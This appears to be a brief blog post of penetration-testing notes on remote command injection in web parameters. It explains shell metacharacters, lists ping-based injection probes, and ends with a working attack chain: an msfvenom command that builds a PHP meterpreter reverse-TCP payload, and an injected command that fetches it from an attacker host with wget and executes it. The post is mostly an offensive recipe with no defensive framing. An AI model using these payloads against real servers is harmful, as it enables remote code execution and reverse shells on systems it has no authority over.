remote command injection

check for web server parameters GET, POST HTTP header


The semicolon is most common metacharacter used to test an injection flaw. The shell would run all the commands in sequence separated by the semicolon.


It separates multiple commands on one command line. It runs the first command then the second command.

It runs the command following  && only if the preceding command is successful

It run the command following || only if the preceding command fails. Runs the first command then runs the second command only if the first command did not complete successfully

|| ( Linux)

Redirects standard outputs of the first command to standard input of the second command

The unquoting metacharacter is used to force the shell to interpret and run the command between the backticks. Following is an example of this command: Variable= “OS version uname -a” && echo $variable


It is used to nest commands


| ping -i 30 |
| ping -n 30|
& ping -i 30
&ping -n 30
;ping -i 30;
%0a ping -i 30 %0a
` ping

If above works then use msfpayload to create following

msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT=666 -e php/base64 -f raw > /root/Desktop/exploit.txt

open exploit.txt file and add php open and close brackets

 <?php echo ... ?>

start http web server and execute following

;wget http://<attacking_ip>/exploit.txt  -O /tmp/exploit.php;php -f /tmp/exploit.php


Leave a Reply

Your email address will not be published.